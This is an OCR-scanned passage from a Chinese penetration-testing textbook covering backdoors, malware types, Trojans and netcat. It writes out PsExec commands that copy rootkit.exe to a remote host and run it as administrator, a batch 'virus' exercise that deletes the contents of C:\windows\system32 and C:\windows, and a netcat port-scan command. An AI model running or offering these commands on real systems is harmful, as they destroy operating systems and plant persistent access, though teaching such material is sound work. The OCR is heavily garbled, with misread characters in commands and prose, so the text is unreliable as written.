议 在 实际 测试 中 应 用 该 (6) 输入 init 0， 关 闭 TRK Linux 系 统 。 

圭 具 之 胃 先 目 行 进行 一 (7) 重新 启动 。 


出 试验 。 
8.8 ”本 童 小 结 


本 章 学 习 了 如 何 区 分 良好 与 不 良 的 密码 ， 如 何 利用 各 种 攻击 破解 密码 ， 以 及 如 何 提升 
权限 。 


8.9 ”过 题 


1. HEYNOW 是 一 个 良好 的 密码 吗 ? 为 什么 ? 
2. 何 为 暴力 破解 攻击 ? 

3. 何 为 离线 攻击 ? 

4. 何 为 被 动 攻击 ? 

5. 何 为 提升 权限 ? 
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渗透 测试 入 门 实 战 


使 用 后 门 和 悉 意 软件 保持 访问 权 


在 获得 系统 访问 权限 后 ， 下 一 步 就 是 进行 攻击 的 主要 环节 。 此 阶段 可 能 涉及 运行 应 用 
程序 ， 修 改 系统 ， 甚 至 跳 转 到 其 他 系统 ， 以 及 在 网 络 中 进行 映射 和 移动 操作 。 此 外 ， 还 需 
要 通过 安装 后 门 程序 和 恶意 软件 来 保留 访问 权限 。 


本 间 将 学 习 : 

安装 后 门 

开启 shell 

启动 病毒 、 蠕 虫 或 间谍 软件 
植 入 木马 

安装 rootkit 
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以 


9.1 决定 如 何 攻击 


在 获得 在 被 攻陷 的 系统 上 执行 应 用 程序 或 其 他 操作 的 机 会 后 ， 需 要 决定 下 一 步 如 何 行 
动 。 后 门 (backdoor) 程 序 的 目标 ， 是 提供 一 种 以 可 绕 过 安全 措施 的 方式 ， 获 取 系 统 访问 权 
的 蔡 代 手段 。 后 门 可 应 用 rootkit、 木 马 或 其 他 类 似 的 形式 。 该 类 型 的 应 用 程序 的 设计 是 以 
保证 后 续 访 问 权 的 方式 ， 和 危害 目标 系统 安全 。 攻 击 者 可 以 使 用 这 些 后 门 来 攻击 系统 。 恶 意 
软件 (malware) 是 指 设计 用 于 捕获 、 算 改 或 危及 系统 的 任何 类 型 的 软件 。 本 章 稍 后 将 重点 介 
绍 这 些 内 容 。 

键盘 记录 器 (keyloggers) 是 用 于 获取 键盘 输入 信息 的 软件 或 硬件 设备 。 便 件 键盘 记录 器 
的 例子 如 图 9.1 和 图 9.2 所 示 。 
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图 9.1 ”一 种 硬件 键盘 记录 器 


图 9.2 ”发 一 种 便 件 键盘 记录 需 


9.2 使 用 PsTools 安 疙 后 门 


在 系统 上 安装 后 门 可 以 使 用 很 多 种 方法 ， 不 过 在 此 介绍 一 种 PsTools 套 件 所 提供 的 方 
法 。PsTools 套 件 是 由 微软 提供 的 一 组 工具 集合 ， 具 有 多 种 功能 。 在 此 捆绑 工具 包 中 包含 
有 PsExec 实 用 程序 ， 该 程序 可 在 目标 系统 上 远程 执行 命令 。 该 工具 的 最 大 优点 是 不 需要 在 
受害 系统 中 安装 ， 使 用 它 之 前 只 需要 将 文件 复制 到 本 地 系统 中 。 

下 面 介绍 一 些 可 用 于 PsExec 的 命令 。 以 下 这 条 命令 将 在 名 为 \ kraid 的 系统 上 局 动 一 个 
交互 式 命令 提示 符 : 

En 

此 命令 在 远程 系统 上 执行 ipconfig， 使 用 /all 参 数 ， 并 在 本 地 显示 结果 输出 : 


psexec \\kraid ipconfig /all 
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此 命令 将 程序 rootkit exe 复 制 到 远程 系统 并 以 交互 方式 执行 : 
psexec \\krald -C rootkit.exe 


此 命令 将 程序 rootkit.exe 复 制 到 远程 系统 ， 并 使 用 该 远程 系统 上 的 管理 员 账户 ， 以 交 
互 方式 执行 


psexec \\krald -uU administrator -C rootkit.exe 


者 决定 ， 要 在 远程 系统 上 做 什么 或 运行 什么 程序 。 常 见 的 选择 包括 木马 、rootkit 或 后 门 。 

其 他 可 能 在 远程 连接 系统 时 有 所 帮助 的 实用 程序 有 : 

RemoteExec 一 个 设计 功能 与 PsExec 十 分 接近 的 实用 工具 ， 但 使 用 它 还 可 以 简单 地 
重启 动 系统 /计算 机 ， 并 对 系统 中 的 文件 夹 进行 操作 。 

VNC (多 个 版 本 ) 该 软件 是 一 个 基础 的 屏幕 共享 软件 ， 是 一 个 常见 且 广 为 人 知 的 工 
具 。 它 因 多 种 原因 ， 如 其 轻 量 和 易 用 性 ， 而 十 分 流行 。 


9.3 使 用 LAN Turtle 开 启 一 个 shell 


笔者 认为 应 该 介绍 的 另 一 个 项 目 是 Hak5 的 LAN Turtle。 该 工具 伪装 为 一 个 简单 的 USB 
以 太 网 适配器 ， 但 实际 上 它 要 危险 得 多 。LAN Turtle 可 用 于 执行 多 种 攻击 ， 例 如 中 间 人 和 
嗅 探 攻 击 等 。 

该 工具 的 强力 攻击 手段 之 一 是 它 能 够 在 系统 上 开启 远程 shell。 在 系统 上 开启 shell 允 许 
通过 一 个 命令 行 界面 回 远 程 系统 发 送 命令 并 执行 任务 。 此 外 ， 该 工具 还 可 用 于 建立 VPN， 
上 述 种 种 功能 都 集成 在 一 个 小 巧 的 封装 中 。LAN Turtle 外 观 如 图 9.3 所 示 。 


. 


9.3 LAN Turtle 


I ; 参 ] 坎 ; 则 式 入 | ] 实 


9.4 识别 各 种 避 总 软件 


恶意 软件 已 迅速 成 为 危害 现代 技术 的 主要 问题 之 一 ， 每 年 都 会 产生 数 百 万 种 新 形式 的 
恶意 软件 (按照 某 些 估计 ， 每 个 小 时 都 有 约 1200 个 新 恶意 软件 被 制造 出 来 )。 

在 渗透 测试 期 间 使 用 或 编写 恶意 软件 可 能 会 有 所 帮助 ， 但 如 果 使 用 不 当 ， 它 也 可 能 是 
非常 危险 的 工具 。 例 如 ， 使 用 一 个 恶意 软件 测试 防 病毒 软件 ， 或 在 系统 中 植 入 后 门 程序 可 
能 有 用 ， 但 是 如 果 后 门 程序 意外 扩散 到 预期 的 目标 区 域 之 外 ， 并 感染 未 参加 测试 的 其 他 系 
统 (甚至 是 其 他 公司 )， 情 况 可 能 会 十 分 严重 。 当 前 ， 此 类 问题 很 容易 让 你 陷入 法 律 困境 ， 
更 不 用 说 将 遭遇 不 可 避免 的 信誉 损失 。 务 必 记 住 ， 感 染 不 属于 测试 区 域 的 系统 可 能 招致 罚 
款 ， 在 某 些 情况 下 甚至 会 导致 身 陷 图 国 。 

如 前 所 述 ， 并 不 是 所 有 的 恶意 软件 都 是 一 回 事 。 术 语 恶意 软件 (malware) 是 一 个 涵盖 一 
整个 系列 具有 恶意 的 软件 的 通称 。 广 义 上 而 言 ， 恶 意 软件 是 指 任何 无 意义 地 消耗 资源 和 时 
间 ， 并 使 用 这 些 资源 执行 一 些 损害 系统 所 有 者 最 大 利益 的 操作 的 软件 。 为 更 直观 形象 地 
说 明 恶意 软件 ， 本 书 在 深入 研究 各 种 恶意 软件 的 机 制 之 前 ， 首 先 分 析 恶 意 软件 都 有 何 
类 型 。 


病毒 (Viruses) 

病毒 采用 复制 自身 并 将 其 附加 到 ( 即 “感染 ”) 目 标 系统 上 的 其 他 文件 的 设计 。 病 毒 需 
要 运行 一 个 主机 程序 以 启动 感染 过 程 。 病 毒 自 20 世 纪 70 年 代 初 以 来 ， 就 已 成 为 一 种 恶意 软 
件 ， 甚 至 还 在 “计算 机 病毒 ”一 词 提 出 之 前 。 


蠕虫 (Worms) 

这 种 形式 的 恶意 软件 和 目 20 世 纪 80 年 代 末 出 现 以 来 ， 已 经 出 现 了 各 种 形式 。 虽 然 第 一 代 
蠕虫 危险 程度 远 不 如 今天 人 们 遇 到 的 蠕虫， 但 它们 仍然 是 有 害 的。 早期 的 蠕虫 可 能 没有 那 
么 强大 ， 但 是 它们 仍然 具有 相同 的 特征 ， 即 不 需要 任何 用 户 交 互 就 能 快速 繁殖 和 传播 的 
能 力 。 

间谍 软件 (Spyware) 

这 类 软件 设计 用 于 以 隐秘 的 方式 收集 有 关 用 户 活 动 的 信息 。 

木马 (Trojan Horses) 

此 类 别 中 的 各 类 恶意 软件 与 病毒 非常 相似 ;， 然而 ， 它 们 使 用 社会 工程 诱 使 用 户 激活 它 
们 。 将 恶意 软件 捆绑 到 用 户 想 要 的 内 容 中 ， 可 以 增加 用 户 执行 恶意 软件 而 导致 感染 的 概率 。 

Rootkit 

Rootkit 是 能 够 隐藏 在 系统 的 硬件 或 软件 中 的 更 先进 的 恶意 软件 形式 之 一 。 这 种 类 型 的 
恶意 软件 更 具 破 坏 性 ， 因 为 由 于 它们 在 系统 的 内 核 级 别 进行 感染 活动 ， 所 以 几乎 不 可 能 检 
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测 到 。 大 多 数 反 恶意 软件 没有 访问 内 核 或 系统 中 的 其 他 应 用 程序 的 权限 。 


加 密 病 毒 (Cryptoviruses)/ 勒 索 软 件 (ransomware) 

这 是 一 种 新 型 的 恶意 软件 ， 此 类 软件 设计 用 于 定位 和 加 密 受 害 者 硬盘 上 的 数据 ， 目 的 
在 于 勒索 赎金 。 受 害 者 的 计算 机 被 感染 后 ， 就 会 收 到 一 条 消息 ， 声 称 他 们 需要 支付 一 定数 量 
的 金钱 ， 以 换取 解锁 他 们 的 文件 的 密 钥 。 本 章 将 不 对 加 密 病 毒 进行 进一步 的 介绍 。 


9.5 启动 病 和 全 


病毒 是 最 古老 的 恶意 软件 形式 ， 是 运 今 为 止 最 广为人知 的 恶意 软件 类 型 。 然 而 ， 到 底 
何 为 病毒 呢 ? 病毒 和 所 有 其 他 类 型 的 恶意 软件 有 何 区 别 ? 


9.5.1 病毒 的 生 售 周 期 


简 而 言 之 ， 归 类 为 病毒 的 恶意 软件 必须 表现 出 这 样 的 特征 : 一 个 自我 复制 ， 并 将 自 
身 附 加 到 其 他 可 执行 程序 之 上 并 感染 后 者 的 应 用 程序 。 许 多 病毒 一 旦 执行 就 会 立刻 感染 主 
机 ， 而 另 一 些 则 会 潜伏 下 来 等 待 预定 的 触发 事件 或 一 段 时 间 ， 再 执行 指令 。 

在 感染 开始 后 ， 病 毒 会 有 何 预期 行为 ? 

@ 算 改 数据 
感染 其 他 应 用 程序 
复制 
加 密 自 身 
将 自身 变 为 另 一 种 形态 
修改 配置 设置 
破坏 数据 
扰乱 或 毁坏 硬件 

那么 病毒 作者 为 何 要 制造 它们 ? 要 细 化 到 某 个 具体 的 原因 比较 难 ， 不 过 一 些 常 见 的 原 
因 有 窃取 信息 、 破 坏 设 备 和 软件 、 影 响 公 司 的 声誉 、 资 用 身份 ， 或 者 (在 某 些 情况 下 ) 就 是 
“为 了 制造 病毒 而 制造 病毒 ”。 

在 渗透 测试 中 可 能 会 发 现 ， 制 作 病毒 是 测试 软件 和 策略 等 防御 措施 的 有 效 手段 。 然 
而 ， 为 未 雨 绸 缪 ， 在 此 提出 一 条 注意 事项 (该 建议 适合 病毒 和 所 有 恶意 软件 ): 如 果 在 测试 
中 使 用 这 些 工 具 ， 应 采取 预防 措施 ， 以 确保 它 不 会 超出 目标 的 范围 。 如 果 最 终 恶 意 软件 扩 
散 到 超出 预期 目标 之 外 ， 结 果 可 能 是 严厉 的 法 律 惩罚 ， 并 断送 职业 生涯 。 为 确保 安全 ， 最 
好 应 在 测试 环境 而 不 是 生产 环境 中 使 用 恶意 软件 。 
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制作 一 个 病毒 可 能 是 一 个 非常 复杂 的 过 程 ， 也 可 能 只 需要 单 击 几 下 按钮 。 高 级 程序 员 
可 能 会 选择 从 头 开始 编写 恶意 软件 。 缺 乏 经 验 的 人 可 能 不 得 不 考虑 其 他 方式 ， 例 如 雇佣 他 
人 编写 病毒 ， 购 买 代码 ， 或 使 用 一 个 “地 下 ”病毒 生成 上 融 应 用 程序 。 最 后 ， 对 于 最 基础 水 
平 的 人 ， 甚 至 有 可 能 获取 预先 构建 的 代码 并 直接 使 用 。 


练习 9.1: 制作 一 个 病毒 
要 完成 此 练习 ， 需 要 使 用 记事 本 并 从 Intemet 获 取 一 份 Bat2Com 程 序 的 副本 。 
在 进行 此 练习 之 前 ， 请 认真 阅读 以 下 免责 声明 。 不 要 执行 这 个 病毒 。 本 练习 旨 
在 作为 概念 证 明 ， 仅 用 于 教学 目的 。 在 系统 上 执行 此 代码 可 能 会 导致 系统 损坏 ， 可 


能 需要 大 量 时 间 和 技能 才能 正确 修复 。 


1. 使 用 Windows 记 事 本 创建 一 个 名 为 virus.bat 的 批 处 理 文件 。 

2. 输入 以 下 代码 行 : 

Qecho off 

Del c:\windows\system32\*.* 

Del Cc:\windows\*.* 

3. 保存 virus.bato 

4. 从 命令 行 中 ,使 用 Bat2com 工具 将 virus.bat 转换 为 virus.com。 


当然 ， 为 了 创建 更 复杂 的 病毒 ， 只 需要 浏览 互联 网 ， 并 搜索 病毒 制作 工具 包 或 病毒 软 
件 开发 工具 包 (SDK)。 这 样 做 会 获得 来 自 许多 不 同 的 来 源 的 大 量 结果 。 虽 然 笔者 在 此 无 法 
对 这 些 包 进行 一 一 阐述 ， 但 可 以 明确 的 是 ， 每 个 包 都 提供 不 同 的 选项 和 功能 ， 有 待 读者 探 
索 。 但 是 ， 如 果 要 深入 了 解 病 毒 创建 工具 包 的 世界 ， 笔 者 警告 ， 务 必 小 心 ， 并 考虑 在 隔离 
或 独立 的 系统 上 运行 它们 。 病 毒 制作 工具 的 实例 如 图 9.4 和 图 9.5 所 示 。 


Molotov Class Virus Maker <> By RiCk CT 二 上 IEGvWus <> B3TA FuCk TEsT < BRAZILIT9938I x| 


VIRUS NaME H3RE | 


| p+ 
sz ViRus 了 全 
会 nm 


HeY! THiS iS a FuCK B3TA TeSt 
Th3 FULL V3rSioN CoMInG 
WW 
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图 9.4 一 个 显示 了 多 种 选项 的 病毒 制作 工具 包 
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图 9.5 一 个 用 于 创建 批 处 理 病 毒 的 病毒 制作 工具 包 


9.5.2 ”病毒 的 类 型 


在 讨论 病毒 时 ， 重 要 的 是 要 了 解 并 非 所 有 的 病毒 都 是 一 个 模子 里 刻 出 来 的 。 即 使 无 法 
记 住 病毒 可 能 具备 的 所 有 形式 ， 也 应 知道 它们 有 着 多 种 不 同类 型 。 了 解 某 个 病毒 的 不 同形 
式 ， 有 助 于 进行 故障 排除 和 诊断 。 

接 下 来 ， 让 我 们 开始 吧 。 


引导 局 区 病毒 (Boot Sector Virus) 
此 类 病毒 专门 以 驱动 器 的 引导 局 区 或 某 几 种 操作 系统 存储 引导 信息 的 位 置 为 目标 。 这 
种 类 型 的 病毒 首先 出 现在 MS-DOS 时 代 ， 但 现在 仍然 存活 得 很 好 ， 并 且 不 时 出 现 。 


浏览 器 劫持 者 (Browser Hijacker) 

这 是 一 种 相对 较 新 的 病毒 ， 通 过 利用 网 络 浏览 器 中 包含 的 漏洞 或 功能 进行 传播 。 此 类 
病毒 以 算 改 主页 或 强制 将 其 他 信息 下 载 到 受害 者 的 计算 机 等 行为 而 知名 。 一 种 浏览 器 动 持 
者 病毒 如 图 9.6 所 示 。 
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图 9.6 ”一 种 复 改 主页 的 浏览 器 劫持 者 


文件 感染 型 病毒 (File Infector Virus) 

这 种 病毒 是 外 界 最 第 见 的 病毒 之 一 。 文 件 感 染 型 病毒 必须 具备 的 特征 是 ， 感 染 程序 
必须 将 自 喘 艇 入 文件 中 ， 并 等 待 该 文件 被 执行 。 此 类 病毒 与 直接 操作 型 病毒 之 间 的 区 别 在 
于 ， 该 类 型 会 覆盖 宿主 文件 ， 或 对 主机 文件 造成 其 他 类 型 的 损坏 。 


宏 病毒 (Macro Virus) 

这 种 类 型 的 恶意 软件 使 用 Microsoft Office 应 用 程序 以 及 其 他 应 用 程序 内 置 的 宏 语 
言 。 这 种 病毒 的 危险 在 于 它 可 以 舱 入 到 一 个 无 害 的 文档 中 ， 等 待 该 文档 加 载 并 执行 宏 。 
Microsoft Excel 弹 出 的 提示 有 宏和 存在 并 且 试 图 运行 的 对 话 框 如 图 9.7 所 示 。 


IMic rosolt Excel 


Ci\Book! ,xls contains macros, 


Macros may coNntain viruses, It is always safe to disable macros, but if the 
macros are legitimate, you might lose some functionality, 


图 9.7 一 个 宏 病 毒 对 话 框 


混合 型 病毒 (Multipartite Virus) 
这 种 类 型 的 病毒 特别 令 人 讨厌 ， 因 为 它 同 时 使 用 多 种 方法 进行 传播 。 感 染 的 方法 可 能 
多 种 多 样 ， 取 决 于 应 用 程序 、 操 作 系 统 版 本 以 及 病毒 作者 期 望 的 病毒 运行 方式 。 
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多 形 病 毒 (Polymorphic Virus) 

此 类 病毒 的 特征 是 在 一 段 时 间 内 反复 重 写 自身 。 通 过 这 种 方式 ， 病 毒 变 得 更 难以 检 
测 ， 因 为 如 果 再 次 被 捕获 ， 它 将 看 起 来 (和 上 次 ) 不 同 。 此 类 病毒 中 的 一 些 更 为 先进 的 变 
种 ， 甚 至 还 会 采用 加 密 隐 藏 其 行为 。 


常 驻 病毒 (Resident Virus) 
这 种 宽泛 的 病毒 分 类 定义 适用 于 任何 运行 后 将 目 有 身 加 载 到 内 存 中 ， 等 待 感染 其 目标 文 
件 的 病毒 。 


Web 脚 本 病毒 (Web Scripting Virus) 
许多 网 站 执行 复杂 的 代码 以 提供 有 趣 的 内 容 。 当 然 ， 这 些 代 码 有 时 可 被 利用 ， 使 得 病 
毒 通过 网 站 感染 或 操作 计算 机 成 为 可 能 。 


加 密 病 毒 (Encrypted Viruses) 
这 种 类 型 的 病毒 包括 配对 的 一 个 载荷 和 一 个 用 于 加 密 整 个 病毒 包 的 加 密 引 擎 。 病 毒 通 
过 使 用 加 密 编程 技术 ， 使 防 病毒 软件 难以 检测 。 


电子 邮件 病毒 (Email Virus) 
这 是 一 种 通过 电子 邮件 传播 的 病毒 。 此 类 病毒 会 隐藏 在 电子 邮件 中 ， 当 收 件 人 打开 邮 
件 时 ， 病 毒 载荷 将 执行 并 造成 破坏 。 


逻辑 炸弹 (Logic Bomb) 

人 们 不 认为 逻辑 炸弹 是 病毒 ， 因 为 它们 不 会 复制 。 它 们 甚至 不 是 独立 的 程序 ， 而 是 其 
他 程序 中 伪装 的 部 分 。 逻 辑 炸弹 的 目标 是 一 旦 满足 某 些 条件 ， 就 破坏 计算 机 上 的 数据 。 风 
辑 炸 弹 在 执行 之 前 检测 不 到 ， 其 后 果 可 能 是 灾难 性 的 。 


9.6 启动 蠕虫 


今天 当 提 及 病毒 话题 时 ， 往 往 也 会 涉及 蚂 虫 。 与 其 需要 一 个 答 主 程序 开始 其 及 脏 工作 
的 近亲 病毒 不 同 ， 蚂 虫 只 需要 一 个 易 受 攻击 的 系统 即 可 局 动 其 自我 复制 过 程 。 使 问题 更 加 
严重 的 是 ， 蠕 虫 可 以 目 行 复制 ， 并 利用 网 络 的 速度 和 便利 性 迅速 传播 。 

一 个 常 被 提 及 的 蠕虫 是 大 约 十 年 前 的 “Slammer” 蠕 虫 。 当 该 蠕虫 活跃 时 ， 其 传播 是 
如 此 快速 高 效 ， 以 致 造成 广泛 的 停机 和 拒绝 服务 。 尽 官 蠕 虫 爆 发 六 个 月 前 已 经 针对 易 受 攻 
击 的 系统 发 布 了 补丁 程序 ， 但 许多 系统 管理 员 未 能 及 时 应 用 该 补丁 。 
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9.7 启动 问 诬 软 件 


接 下 来 介绍 的 恶意 软件 类 型 称 为 则 诬 软 件 ， 它 专门 用 于 收集 第 三 方 的 信息 。 这 种 类 型 
的 软件 在 后 台 运 行 ， 在 用 户 的 视线 之 外 悄悄 收集 信息 ， 并 将 信息 发 送 给 制造 者 。 收 集 的 内 
容 可 用 于 确定 广告 目标 ， 盗 用 身份 ， 谋 取 收 入 ， 晕 改 系统 ， 还 可 以 获取 其 他 信息 。 此 外 ， 
间谍 软件 可 能 只 是 攻击 的 第 一 波 ， 用 于 帮助 制造 者 了 解 更 多 关于 目标 的 信息 ， 开 启 后 续 攻 
击 的 门 径 。 

此 类 恶意 软件 可 以 使 用 多 种 方法 入 侵 系统 ， 但 本 书 在 此 只 会 重点 介绍 几 种 。 

间谍 软件 有 以 下 一 些 感染 途径 。 


BT 下 载 网 站 

“有 所 得 必 有 所 失 ” 这 人 句 古 老 格言 对 于 文件 共享 网 络 而 言 可 谓 恰 如 其 分 。 虽 然 并 不 是 
每 一 个 流行 的 BT 和 文件 共享 网 站 上 的 软件 或 文件 都 感染 了 某 种 恶意 软件 ， 但 感染 仍然 比 
许多 人 想 得 更 为 普遍 。 


即时 通讯 (IM) 
传统 上 ， 即 时 通讯 软件 的 设计 贯彻 了 开放 的 理念 ， 而 没有 考虑 任何 实质 形式 的 安全 。 
虽然 问题 已 有 所 改善 ， 但 发 送 恶 意 链接 等 信息 仍然 是 可 能 的 ， 从 而 仍然 能 够 感染 受害 者 。 


电子 邮件 附件 
电子 邮件 不 仅 是 当今 通信 的 重要 手段 ， 而 且 也 已 被 确证 是 一 种 十 分 有 效 的 散布 各 种 亚 
意 软 件 的 机 制 。 结 合 网 络 钓鱼 攻击 ， 舱 入 恶意 链接 或 将 文件 附加 到 电子 邮件 相当 有 效 。 


物理 访问 

如 果 攻 击 者 获得 对 系统 的 物理 访问 ， 则 很 容易 进行 感染 。 插 入 闪存 驱动 器 或 插入 硬件 
键盘 记录 器 片刻 即 可 完成 。 此 类 攻击 可 以 通过 在 人 流量 大 的 区 域 散布 USB 设 备 诱饵 实现 ， 
一 个 好 奇 的 工作 人 员 可 能 将 其 插入 系统 ， 查 看 其 中 的 内 容 。 


浏览 器 扩展 程序 
许多 用 户 忘 记 或 有 意 选 择 不 在 浏览 器 更 新 发 布 时 立即 进行 更 新 ， 使 得 恶意 软件 更 易于 


传播 。 
网 站 
许多 网 站 使 用 了 一 种 称 为 “路 过 即 下 载 (drive-by downloading)” 的 技术 ， 导 致 仅 仅 是 


访问 某 个 网 站 就 足以 感染 系统 。 此 类 攻击 通常 通过 flash 动 画 或 各 种 脚本 实现 。 
另 一 种 引 人 注 目的 恶意 软件 传播 机 制 来自 硬 件 厂商 本 身 。 例 如 ， 在 2015 年 初 ， 联 想 被 
发 现在 其 许多 计算 机 上 预 装 了 一 种 名 为 SuperFish 的 恶意 软件 。 这 种 恶意 软件 专门 用 于 监视 


和 学 习 用 户 的 浏览 习惯 ,然后 专门 针对 用 户 的 兴趣 ， 展 示 内 容 。 虽 然 这 种 恶意 软件 并 非 十 
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分 有 害 ， 但 应 考虑 到 这 一 事实 : 该 软件 被 发 现 拦截 通信 ， 从 而 破坏 应 当 安 全 的 连接 的 安 
全 性 。 在 软件 被 公之于众 后 ， 联 想 不 得 不 坦白 交代 ， 承 认 软 件 的 存在 ， 并 公布 清除 软件 的 
指南 。 

在 联想 因 SuperFish 出 现 公 关 问 题 之 后 不 入， 戴尔 电脑 也 遇 到 了 类 似 的 问题 ， 在 其 硬件 
中 有 类 似 SuperFish 的 恶意 软件 。 和 联想 一 样 ， 戴 尔 不 得 不 处 理 在 其 系统 上 预 装 恶意 软件 的 
后 果 。 

截至 2016 年 初 ， 两 家 公司 均 已 受到 或 将 面临 来 自 补 激怒 的 消费 者 和 隐私 权 倡 导 者 就 
SuperFish 事 件 发 起 的 诉讼 。 


9.8 植 入 木马 


下 面 介 绍 一 种 可 以 在 渗透 测试 中 使 用 的 工具 : 木马 。 那 么 什么 是 木马 ? 简 而 言 之 ， 
木马 是 一 种 采用 伪装 成 其 他 软件 的 方式 诱 使 受害 者 执行 的 软件 ， 通 常 的 伪装 方式 是 将 其 封 
装 在 另 一 个 作为 载体 的 程序 中 。 由 于 使 用 另 一 个 程序 作为 载体 ， 它 依赖 于 所 谓 的 社会 工 
程 ， 即 利用 人 类 行为 的 弱点 ， 进 行 其 感染 活动 。 

在 入 侵 系 统 后 ， 木 马 的 目标 与 病毒 或 蠕虫 相似 : 获取 和 维护 系统 的 控制 权 ， 或 执行 其 
他 任务 。 

为 什么 要 选择 部 署 木 马 ， 而 不 是 一 个 真实 病毒 或 其 他 项 目 ? 主要 原因 是 木马 通常 是 隐 
菩 的 ， 可 以 避 过 检测 ， 再 加 上 这 样 一 个 事实 ， 即 木马 可 以 在 幕后 执行 以 其 他 方式 执行 时 可 
会 更 加 明显 的 大 量 动作 。 

那么 有 何 检 测 木马 的 方法 ? 其 中 一 种 方法 是 判断 木马 是 否 正在 通过 开启 与 其 他 系统 
的 连接 ， 与 之 联系 。 可 以 通过 使 用 netstat 做 到 这 一 点 。 


练 避 9.2: 使 用 netstat 检 测 木 马 

该 工具 包含 在 Windows 操 作 系 统 中 ， 可 用 于 执行 多 种 任务 一 一 在 此 用 于 检测 开放 
的 通信 闹 口 。 

按照 以 下 步 又 使 用 netstat: 

(1) 打开 一 个 命令 提示 符 。 

(2) 在 命令 行 中 ， 输 入 netstat -an。 

(3) 观察 输出 结 采 。 

在 大 多 数 系 统 上 ， 可 以 看 到 一 些 开放 和 监听 状态 的 端口 ， 但 类 型 和 数量 将 取决 
于 系统 和 正在 运行 的 程序 而 有 所 不 同 。 在 实践 中 ， 应 当 分 析 结果 ， 寻 找 任何 可 能 不 
寻常 、 需 要 额外 关注 的 现象 。 


练习 9.3: 使 用 TCPView 查 看 实时 通信 
netstat 是 一 个 强大 的 工具 ,但 其 缺点 之 一 是 其 并 非 实 时 ， 必 须 重 新 运行 以 获得 当 
前 的 结果 。 但 是 ， 如 采 和 硕 望 实时 碍 看 结果 ， 可 选择 TCPView 工 具 。 
如 果 还 没有 TCPView ， 可 以 从 wwwmicrosoftcom 倪 费 下 载 。 


要 使 用 TCPView， 请 按照 下 列 步 又 操作 : 

(1) 在 Windows 中 ， 运 行 tcpview.exe 可 执行 文件 。 

(2) 观察 GUI 中 的 结果 。 

(3) 保持 TCPView 运 行 ， 打 开 Web 浏 览 釉 ， 然 后 访问 www.wileycom。 

(4) 在 TCPView 中 ， 注 意 结 果 增 加 了 新 项 目 。 

(5) 在 浏览 絮 中 ， 请 访问 www.youtube.com( 或 其 他 视 首 频 流 媒 体 网 站 )， 并 播放 一 
个 视频 或 内 容 。 

(6) 在 TCPView 中 ,观察 项 目 如 何 随 着 端口 的 开启 和 关闭 而 改变 。 观 察 一 两 分 
钟 ， 并 注意 显示 如 何 更 新 。 

(7) 关闭 Web 浏 览 器 。 

(8) 在 TCPView 中 ， 观 察 某 些 连接 和 应 用 程序 移 除 时 显示 如 何 更 新 。 

使 用 TCPView 时 ， 可 以 将 屏幕 内 容 的 快照 保存 到 一 个 TXT 文件 。 此 功能 非常 有 助 
于 调查 和 后 续 的 信息 分 析 ， 并 可 能 用 于 后 续 事 件 管理 中 。 


9.8.1 使 用 netcat 工 作 


接 下 来 将 介绍 一 个 最 为 流行 的 用 于 网 络 管理 ， 但 在 某 些 情况 下 也 可 以 用 作 特 洛 伊 木 
马 的 工具 。netcat 是 一 个 作为 网 络 分 析 工 具 编 写 的 应 用 程序 。 它 可 使 用 任何 期 望 的 端口 在 
两 全 机 器 之 间 打 开 TCP 和 UDP 连接 。 如 果 需 要 或 是 其 他 方法 无 效 ， 还 可 以 将 其 用 作 类 似 于 
nmap 的 关口 扫 摘 工具 。 

此 外 ，netcat 可 用 于 回 远 程 系统 开放 一 个 连接 。 如 果 单 独 使 用 netcat， 则 可 以 有 效 地 在 
系统 上 开局 一 个 远程 shell。 但 如 果 将 netcat 捆 绑 在 另 一 个 可 执行 文件 中 ， 则 可 以 将 其 用 作 
木马 并 将 其 传递 给 目标 。 

netcat 只 有 一 个 可 执行 文件 ， 可 以 配置 为 客户 端 或 服务 器 运行 ， 取 诀 于 具体 的 目标 。 
通常 ， 使 用 netcat 的 过 程 包 括 将 其 植 入 受害 系统 ， 然 后 使 用 客户 端 连接 到 系统 ， 并 同 主机 
发 出 命令 (可 以 通过 制作 一 个 木马 或 其 他 方法 ， 将 该 软件 部 署 到 受害 系统 上 实现 )。 也 可 以 
简单 地 通过 纯粹 的 社会 工程 方法 (如 网 络 钓鱼 )， 将 该 软件 植 入 受害 系统 上 。 

为 了 学 习 目 的 ， 在 此 假定 netcat 软 件 已 存在 于 客户 端 中 ， 并 且 可 以 随意 访问 “受害 
者 ”系统 以 随意 安装 和 配置 netcat 软 件 。 此 外 ， 还 假定 客户 端 和 服务 器 都 是 基于 Windows 
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的 ， 尽 管 此 处 的 命令 (例如 netcab 可 以 在 Windows、Linux 和 Unix 平 台 上 运行 。 


要 解放 netcat 的 能 力 ， 首 先 要 了 解 其 语法 及 工作 原理 。 首 先 ，netcat 的 工作 方式 是 通过 
打开 与 主机 的 一 个 TCP 连 接 以 与 远程 系统 通信 。 这 些 与 远程 系统 的 连接 可 用 于 执行 多 种 操 
作 ， 但 这 些 操 作 均 始 于 应 用 一 套 易 于 理解 的 结构 或 语法 ， 如 下 所 示 : 

cc [选项 ] < 主机 地 址 > < 端口 号 > 

该 命令 将 以 类 似 Telnet 的 方式 ， 回 由 主机 地 址 和 端口 号 定义 的 远程 系统 发 送 请 求 。 

和 Telnet 十 分 类 似 ，netcat 并 不 加 密 或 采取 其 他 操作 保护 其 通信 ， 因 此 可 能 对 其 进行 饭 
听 和 检测 。 

如 果 需 要 更 高 的 隐蔽 级 别 ， 也 可 以 建立 到 主机 的 UDP 连接 。 要 使 用 基于 UDP 的 连接 ， 
只 需要 执行 以 下 命令 : 

cc -u <host address> <port number> 


了 解 这 一 基本 语法 后 ， 即 可 使 用 netcat 来 执行 先前 进行 过 的 操作 ， 例 如 端口 扫描 。 那 
么 到 底 应 当 如 何 做 ? 通过 执行 以 下 命令 : 

nc -zz -Vv < 主机 地 址 > 1-1000 

该 命令 将 扫描 从 1 到 1000 的 所 有 端口 。-z 选 项 使 netcat 不 演 试 连接 ， 从 而 降低 被 检测 的 
概率 。 最 后 ，-v 选 项 将 netcat 置 于 详情 (verbose) 模 式 ， 此 模式 可 提供 有 关 其 正在 执行 的 操作 
的 更 多 信息 。 

输出 将 与 下 文 类 似 : 


nc: connect to zebes.com Port 


(tcp) failed: Connection refused 


nc: Connect to zebes.com port (tcp) failed: Connection refused 


nc: Connect to zebes.com port (tcp) failed: Connection refused 


nc: connect to zebes.com port (tcp) failed: Connection refused 


(tcp) failed: Connection refused 


1 
2 
3 

